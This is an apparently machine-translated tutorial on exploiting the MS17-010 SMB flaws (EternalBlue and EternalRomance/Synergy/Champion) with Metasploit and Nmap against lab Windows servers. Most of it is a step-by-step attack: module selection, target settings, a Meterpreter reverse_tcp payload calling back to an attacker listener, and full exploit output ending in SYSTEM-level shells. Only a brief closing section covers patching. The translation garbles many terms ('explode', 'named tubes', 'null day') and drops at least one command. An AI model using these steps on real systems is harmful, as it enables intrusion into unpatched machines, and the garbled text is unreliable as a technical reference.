Particular vulnerabilities and exploits come out and create headlines with their catchy name and impressive potential for damage. EternalBlue is one of these exploits. Originally attached to the NSA, this null day exploited an error in the SMB protocol, which affected many Windows machines and caused abuse everywhere. Here we will use EternalBlue to utilize SMB via Metasploit.
What is EternalBlue?
EternalBlue is an exploitation that is likely to have been developed by NSA as a former null day. It was released in 2017 by Shadow Brokers, a hacker group known for leaking tools and exploits used by the Equation Group, which have possible ties to the NSA's tailor-made Access Operations unit.
EternalBlue, also known as MS17-010, is a vulnerability in Microsoft's Server Message Block (SMB) protocol. SMBs allow systems to share access to files, printers, and other resources on the network. The vulnerability may occur because earlier versions of the SMB include an error that allows an attacker to establish a zero session connection via anonymous login. An attacker can then send erroneous packets and finally execute arbitrary commands on the target.
EternalBlue was primarily responsible for WannaCry, NotPetya and BadRabbit ransomware outbreaks, as well as the EternalRocks mask.
Option 1: Use EternalBlue with Metasploit
We use a repackaged copy of Windows Server 2008 R2 as the target for the first part of this tutorial. An evaluation copy can be downloaded from Microsoft so that you can better follow.
Step 1: Find a module to use
The first thing we need to do is open the terminal and start Metasploit. Type service postgresql start to initialize the PostgreSQL database, if it is not already running, followed by msfconsole .
service postgresql start msfconsole
Then use the search command within the Metasploit to find a suitable module to use.
Matching modules ================ Name Disclosure Date Rank Check Description ------------------ ----------- extra / admin / smb / ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB Remote control Windows Command Execution help / scanner / smb / smb_ms17_010 normal Yes MS17-010 SMB RCE detection explode / windows / smb / ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote control Windows Kernel Pool Corruption explode / windows / smb / ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote control Windows Kernel Pool Corruption for Win8 + explode / windows / smb / ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB Remote Windows Code Execution
There is a help scanner that we can run to determine if a target is vulnerable to MS17-010 . It is always a good idea to do the necessary reconstruction like this. Otherwise, you can stop wasting a lot of time if the target is not even vulnerable.
Once we have decided that our goal is really vulnerable to EternalBlue, we can use the following utilization module from
Using exploit / windows / smb / ms17_010_eternalblue
You know you are good if you see "the prompt (windows / smb / ms17_010_eternalblue)".
Module options (exploit / windows / smb / ms17_010_eternalblue): Name Current setting Mandatory Description ---- --------------- -------- ----------- RHOSTS yes Target address range or CIDR identifier RPORT 445 yes Target port (TCP) SMBDomain. no (optional) Windows domain to use for authentication SMBPass No (Optional) The password for the specified user name SMBUser no (Optional) The username to verify as VERIFY_ARCH true yes Check if remote architecture matches use Target. VERIFY_TARGET true yes Check if remote operating system matches exploit Target. Utnyttjemål: Id Name - ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs
First, we need to enter the target's IP address.
set rhosts 10.10.0.101
rhosts => 10.10.0.101
Next, we can load the trustworthy reverse_tcp shell as the payload.
Enter payload window / x64 / meterpreter / reverse_tcp
payload => windows / x64 / meterpreter / reverse_tcp
set lhost 10.10.0.1
lhost => 10.10.0.1
And the listening port to a suitable number.
set lport 4321
lport => 4321
It should be all, so the only thing that remains is to launch the exploitation. Use the command to run it .
[*] Started reverse TCP manager at 10.10.0.1:4321 [*] 10.10.0.101:445 - Connection to goals for exploitation. [+] 10.10.0.101:445 - Connection established for exploitation. [+] 10.10.0.101:445 - Target OS selected for OS specified by SMB response [*] 10.10.0.101:445 - CORE raw buffer dump (51 bytes) [*] 10.10.0.101:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [*] 10.10.0.101:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard [*] 10.10.0.101:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac [*] 10.10.0.101:445 - 0x00000030 6b 20 31 k 1 [+] 10.10.0.101:445 - Target arc selected for arc indicated by DCE / RPC response [*] 10.10.0.101:445 - Trying to utilize 12 Groom Allocations. [*] 10.10.0.101:445 - Sends everything but the last fragment of the exploit package [*] 10.10.0.101:445 - Start non-paged pool grooming [+] 10.10.0.101:445 - Send SMBv2 buffers [+] 10.10.0.101:445 - Terminating SMBv1 connection creates free holes in connection with SMBv2 buffer. [*] 10.10.0.101:445 - Sending final SMBv2 buffers. [*] 10.10.0.101:445 - Sends the last fragment of the exploit package! [*] 10.10.0.101:445 - Receiving response from exploitation package [+] 10.10.0.101:445 - ETERNALBLUE write written ready (0xC000000D)! [*] 10.10.0.101:445 - Send eggs to damaged connection. [*] 10.10.0.101:445 - Release from damaged buffer. [*] Transmission steps (206403 bytes) to 10.10.0.101 [*] Meterpreter session 1 opened (10.10.0.1:4321 -> 10.10.0.101:49207) at 2019-03-26 11:01:46 -0500 [+] 10.10.0.101:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = [+] 10.10.0.101:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - WIN - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = [+] 10.10.0.101:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = meterpreter>
We see that some things happen here, such as the SMB connection being established and the exploitation package being sent. Finally we see a "WIN" and a Meterpreter session opens. Sometimes this exploitation will not be successfully completed the first time, so if it doesn't just try again and it will go through.
We can verify that we have compromised the target by running commands like sysinfo to obtain operating system information.
Computer: SO2 OS: Windows 2008 R2 (Build 7601, Service Pack 1). Architecture: x64 System Language: en_US Domain: DLAB Log in to users: 2 Meterpreter: x64 / windows
and getuid to get the current username.
Server username: NT AUTHORITY SYSTEM
This exploitation does not work well on new systems, and in some cases it may crash the target machine.
Option 2: EternalRomance / EternalSynergy / EternalChampion
As if EternalBlue was not devastating enough, three more similar exploits developed after that. EternalRomance and EternalSynergy utilize a type of confusion (CVE-2017-0143), while EternalChampion and EternalSynergy utilize a competitive relationship (CVE-2017-0146).
These were combined in a single Metasploit module that also uses the classic psexec payload. It is considered more reliable than EternalBlue, less likely to crash the target, and works on all newly unmatched versions of Windows, up to Server 2016 and Windows 10.
The only approach is that this exploits requires a named tube. Named tubes provide a method for running processes to communicate with each other, usually as a file for other processes to be attached. The Metasploit module automatically checks for named tubes, making it quite easy to use as long as a named tube is present on the target.
Step 1: Finding a Vulnerable Goal
We can use Nmap as an alternative to the Metasploit scanner to discover if a target is vulnerable to EternalBlue. Nmap Scripting Engine is a powerful feature of the core tool that allows all types of scripts to run towards a target.
Here we use the script smb-vuln-ms17-010 to check for the vulnerability. Our goal will be a repackaged copy of the Windows Server 2016 Datacenter release. Evaluation copies can be downloaded from Microsoft so you can follow if you want.
We can enter a single script to run with the – script option along with -v flag for verbosity and our target's IP address. First change directories if you are still running Metasploit.
CD nmap - script smb-vuln-ms17-010 -v 10.10.0.100
Nmap starts and should not take too long because we just run a script. At the end of the exit we find the results.
Start Nmap 7.70 (https://nmap.org) at 2019-03-26 11:05 CDT NSE: Loaded 1 scripts for scanning. NSE: Script Pre-scan. Initiation of NSE at 11:05 ... Host script results: | smb vuln-ms17-010: | VULNERABLE: | External code execution security in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | ID: CVE: CVE-2017-0143 | Risk factor: HIGH | There is a vulnerable remote security code in Microsoft SMBv1 | servers (ms17-010). | | Entry date: 2017-03-14 | references: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ | _ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx NSE: Script Mail Scanning. Initiation of NSE at 11:05 Completed NSE at 11:05, past 0.00 Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned for 2.31 seconds Raw package sent: 1181 (51.948KB) | Rcvd: 1001 (40.060KB)
We can see it listing the target as vulnerable, along with additional information such as risk factors and links to CVE.
Now that we know the goal is vulnerable, we can go back to the Metasploit and search for an appropriate utilization.
msfconsole search for eternity
Matching modules ================ Name Disclosure Date Rank Check Description ------------------ ----------- extra / admin / smb / ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB Remote control Windows Command Execution explode / windows / smb / ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB Remote Windows Code Execution
And load the module in Metasploit with the command used .
Using exploit / windows / smb / ms17_010_psexec
You know you're good if you look "fast (Windows / smb / ms17_010_psexec)".
Let's take a look at our options:
Module options (exploit / windows / smb / ms17_010_psexec): Name Current setting Mandatory Description ---- --------------- -------- ----------- DBGTRACE false yes Display additional troubleshooting information LEAKATTEMPTS 99 yes How many times do you try to leak the transaction NAMEDPIPE no A named pipe that can be connected to (leave blank for auto) NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named tubes to check RHOSTS yes Target address range or CIDR identifier RPORT 445 yes Target port SERVICE_DESCRIPTION no Service description for use on goals for fine listing SERVICE_DISPLAY_NAME no Service Display Name SERVICE_NAME no The service name SHARE ADMIN $ yes The part to be connected to can be an admin file (ADMIN $, C $, ...) or a common read / write folder share SMBDomain. no Windows domain to use for authentication SMBPass no Password for the specified username SMBUser no The username to verify as Utnyttjemål: Id Name - ---- 0 Automatic
It seems that this uses a list of named pipes to control and connect to some. We can leave all of this as standard for now, but we have to set up remote hosts.
set rhosts 10.10.0.100
rhosts => 10.10.0.100
And the payload of the reverse shell.
and local host port.
set lport 4321
lport => 4321
We should be good to go now. Type to run to start exploit.
[*] Started reverse TCP manager at 10.10.0.1:4321 [*] 10.10.0.100:445 - Goal OS: Windows Server 2016 Standard Evaluation 14393 [*] 10.10.0.100:445 - Built a write-what-was primitive ... [+] 10.10.0.100:445 - Write over ... SYSTEM session obtained! [*] 10.10.0.100:445 - Selects PowerShell targets [*] 10.10.0.100:445 - Implementation of payload ... [+] 10.10.0.100:445 - Service is started, OK if you are running a command or not executable ... [*] Transmission steps (206403 bytes) to 10.10.0.100 [*] Meterpreter session 2 opened (10.10.0.1: 4321 -> 10.10.0.100:49965) at 2019-03-26 11:12:30 -0500
We can see the payload manages to implement, and we end up with a meter session.
Again, we can verify that we have compromised the system with commands like sysinfo .
Computer: DC01 OS: Windows 2016 (Build 14393). Architecture: x64 System Language: en_US Domain: DLAB Log in to users: 4 Meter preter: x64 / windows
and getuid .
Server username: NT AUTHORITY SYSTEM
Preventive and current status
Despite all the damage EternalBlue has caused is a reliable way to prevent these types of exploits: patch your systems! At this point, almost two years since these vulnerabilities were revealed, there is really no excuse for having outdated operating systems.
However, EternalBlue continues to be a problem, and although the consequences are ugly, unfortunately some organizations will still run unread systems. That, combined with pirate versions of Windows, makes EternalBlue an important threat to this day.
Cryptojacking, which uses a victim's computer secretly my cryptocurrency, is another threat vector that uses EternalBlue to claim attacks. WannaMine was one of those outbreaks that hijacked computers around the world in 2018.
Today we learned about EternalBlue and how we use it with Metasploit. We also learned about an exploitation that is similar to EB which is more reliable and works with more systems. In the next tutorial we will dig a little deeper and learn how to utilize EternalBlue manually, which is much more satisfactory in the end.